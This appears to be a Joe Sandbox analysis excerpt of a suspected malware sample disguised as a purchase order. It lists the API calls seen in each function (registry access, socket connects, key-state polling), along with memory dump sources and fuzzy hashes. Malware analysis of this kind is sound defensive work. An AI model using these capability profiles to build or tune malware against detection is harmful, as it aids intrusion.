                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                    • String ID:
                                                    • API String ID: 3488606520-0
                                                    • Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                    • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                    • Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                    • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 15295421-0
                                                    • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                    • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                    • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                    • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004563A6
                                                    • ScreenToClient.USER32(?,?), ref: 004563C3
                                                    • GetAsyncKeyState.USER32(?), ref: 00456400
                                                    • GetAsyncKeyState.USER32(?), ref: 00456410
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                    • String ID:
                                                    • API String ID: 3539004672-0
                                                    • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                    • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                    • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                    • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                    • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                    • String ID:
                                                    • API String ID: 327565842-0
                                                    • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                    • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                    • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                    • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String
                                                    • String ID:
                                                    • API String ID: 2832842796-0
                                                    • Opcode ID: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                                    • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                    • Opcode Fuzzy Hash: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                                    • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                    • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Enum$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 2095303065-0
                                                    • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                    • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                    • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                    • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00436A24
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: RectWindow
                                                    • String ID:
                                                    • API String ID: 861336768-0
                                                    • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                    • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                    • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                    • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                    APIs
                                                    • SendMessageW.USER32 ref: 00449598
                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                    • _wcslen.LIBCMT ref: 0044960D
                                                    • _wcslen.LIBCMT ref: 0044961A
                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_wcslen$_wcspbrk
                                                    • String ID:
                                                    • API String ID: 1856069659-0
                                                    • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                    • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                    • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                    • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004478E2
                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                    • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                    • GetCursorPos.USER32(00000000), ref: 0044796A
                                                    • TrackPopupMenuEx.USER32(009764C0,00000000,00000000,?,?,00000000), ref: 00447991
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CursorMenuPopupTrack$Proc
                                                    • String ID:
                                                    • API String ID: 1300944170-0
                                                    • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                    • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                    • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                    • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004479CC
                                                    • GetCursorPos.USER32(?), ref: 004479D7
                                                    • ScreenToClient.USER32(?,?), ref: 004479F3
                                                    • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 1822080540-0
                                                    • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                    • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                    • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                    • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                    • String ID:
                                                    • API String ID: 659298297-0
                                                    • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                    • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                    • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                    • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                    APIs
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(00971A68,000000F1,00000000,00000000), ref: 00440E6E
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(00971A68,000000F1,00000001,00000000), ref: 00440E9A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$EnableMessageSend$LongShow
                                                    • String ID:
                                                    • API String ID: 142311417-0
                                                    • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                    • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                    • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                    • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                    • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                    • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                    • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00445879
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                    • _wcslen.LIBCMT ref: 004458FB
                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                    • String ID:
                                                    • API String ID: 3087257052-0
                                                    • Opcode ID: bbe137feb6b63bbf11b605acf61b54fb28c264edd24c8eb0931df9f2f28af623
                                                    • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                    • Opcode Fuzzy Hash: bbe137feb6b63bbf11b605acf61b54fb28c264edd24c8eb0931df9f2f28af623
                                                    • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                    APIs
                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 245547762-0
                                                    • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                    • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                    • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                    • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 004471D8
                                                    • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                    • SelectObject.GDI32(?,00000000), ref: 00447228
                                                    • BeginPath.GDI32(?), ref: 0044723D
                                                    • SelectObject.GDI32(?,00000000), ref: 00447266
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
